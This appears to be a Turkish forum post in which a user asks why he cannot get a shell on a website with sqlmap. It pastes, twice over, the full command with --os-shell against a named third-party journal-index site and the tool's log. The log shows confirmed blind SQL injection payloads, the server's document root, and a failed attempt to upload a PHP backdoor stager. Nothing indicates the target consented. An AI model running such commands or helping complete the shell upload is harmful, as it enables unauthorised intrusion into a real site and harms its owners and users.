Merhaba arkadaslar. Ben MagmaCrocodile. Ne kadar ugrassamda internetten bakmadigim kaynak kalmasada bir turlu sqlmap ile shell basamiyorum...
yazdigim girdi: python2 sqlmap.py --flush-session -u Eurasian Scientific Journal Index --data="id=14" --os-shell
output:
[04:10:23] [INFO] testing connection to the target URL
[04:10:24] [INFO] heuristics detected web page charset 'UTF-8-SIG'
[04:10:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[04:10:24] [INFO] testing if the target URL content is stable
[04:10:25] [INFO] target URL content is stable
[04:10:25] [INFO] testing if GET parameter 'id' is dynamic
[04:10:25] [INFO] GET parameter 'id' appears to be dynamic
[04:10:25] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[04:10:25] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads spfor the remaining tests, do you want to include all tests for 'MySQL' extending [04:10:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:10:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:10:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:10:34] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="OF")
[04:10:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:10:34] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:10:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:10:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:10:35] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:10:35] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:10:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:35] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:10:36] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:10:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:10:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:10:37] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:10:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:10:37] [INFO] testing 'MySQL inline queries'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[04:10:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[04:10:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[04:10:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[04:10:49] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[04:10:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:10:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[04:10:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:10:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[04:10:51] [INFO] target URL appears to have 22 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:11:30] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[04:11:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[04:11:39] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[04:11:43] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[04:11:47] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[04:12:18] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[04:12:18] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[04:12:21] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[04:12:25] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[04:12:30] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[04:12:34] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[04:12:38] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[04:12:42] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[04:12:44] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if anysqlmap identified the following injection point(s) with a total of 451 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=14' AND 2318=2318#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=14' AND SLEEP(5)-- Jpym
---
[04:12:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:12:47] [INFO] going to use a web backdoor for command prompt
[04:12:47] [INFO] fingerprinting the back-end DBMS operating system
[04:12:47] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[04:12:49] [INFO] retrieved the web server document root: '/home/users/p/pasha369/domains/esjindex.org'
[04:12:49] [INFO] retrieved web server absolute paths: '/home/users/p/pasha369/domains/esjindex.org/search.php'
[04:12:49] [INFO] trying to upload the file stager on '/home/users/p/pasha369/domains/esjindex.org/' via LIMIT 'LINES TERMINATED BY' method
[04:12:51] [WARNING] unable to upload the file stager on '/home/users/p/pasha369/domains/esjindex.org/'
[04:12:51] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times, 404 (Not Found) - 7 times
[04:12:51] [INFO] fetched data logged to text files under '/home/magmacrocodile/.sqlmap/output/esjindex.org'
yazdigim girdi: python2 sqlmap.py --flush-session -u Eurasian Scientific Journal Index --data="id=14" --os-shell
output:
[04:10:23] [INFO] testing connection to the target URL
[04:10:24] [INFO] heuristics detected web page charset 'UTF-8-SIG'
[04:10:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[04:10:24] [INFO] testing if the target URL content is stable
[04:10:25] [INFO] target URL content is stable
[04:10:25] [INFO] testing if GET parameter 'id' is dynamic
[04:10:25] [INFO] GET parameter 'id' appears to be dynamic
[04:10:25] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[04:10:25] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads spfor the remaining tests, do you want to include all tests for 'MySQL' extending [04:10:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:10:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:10:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:10:34] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="OF")
[04:10:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:10:34] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:10:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:10:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:10:35] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:10:35] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:10:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:35] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:10:36] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:10:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:10:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:10:37] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:10:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:10:37] [INFO] testing 'MySQL inline queries'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[04:10:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[04:10:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[04:10:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[04:10:49] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[04:10:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:10:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[04:10:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:10:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[04:10:51] [INFO] target URL appears to have 22 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:11:30] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[04:11:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[04:11:39] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[04:11:43] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[04:11:47] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[04:12:18] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[04:12:18] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[04:12:21] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[04:12:25] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[04:12:30] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[04:12:34] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[04:12:38] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[04:12:42] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[04:12:44] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if anysqlmap identified the following injection point(s) with a total of 451 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=14' AND 2318=2318#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=14' AND SLEEP(5)-- Jpym
---
[04:12:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:12:47] [INFO] going to use a web backdoor for command prompt
[04:12:47] [INFO] fingerprinting the back-end DBMS operating system
[04:12:47] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[04:12:49] [INFO] retrieved the web server document root: '/home/users/p/pasha369/domains/esjindex.org'
[04:12:49] [INFO] retrieved web server absolute paths: '/home/users/p/pasha369/domains/esjindex.org/search.php'
[04:12:49] [INFO] trying to upload the file stager on '/home/users/p/pasha369/domains/esjindex.org/' via LIMIT 'LINES TERMINATED BY' method
[04:12:51] [WARNING] unable to upload the file stager on '/home/users/p/pasha369/domains/esjindex.org/'
[04:12:51] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times, 404 (Not Found) - 7 times
[04:12:51] [INFO] fetched data logged to text files under '/home/magmacrocodile/.sqlmap/output/esjindex.org'
